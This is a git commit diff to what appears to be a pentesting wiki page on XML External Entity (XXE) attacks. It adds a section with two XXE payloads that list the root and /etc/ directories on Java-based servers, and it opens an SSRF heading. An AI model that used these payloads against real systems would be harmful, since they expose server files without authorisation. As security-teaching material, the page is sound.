GitBook: [master] one page modified

This commit is contained in:
CPol 2021-08-03 11:46:59 +00:00 committed by gitbook-bot
parent 76100d0b06
commit 77754cb2d9
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
![](../.gitbook/assets/image%20%2832%29.png)
### Directory listing
In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
```markup
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF
An XXE could also bu used to abuse a SSRF inside a cloud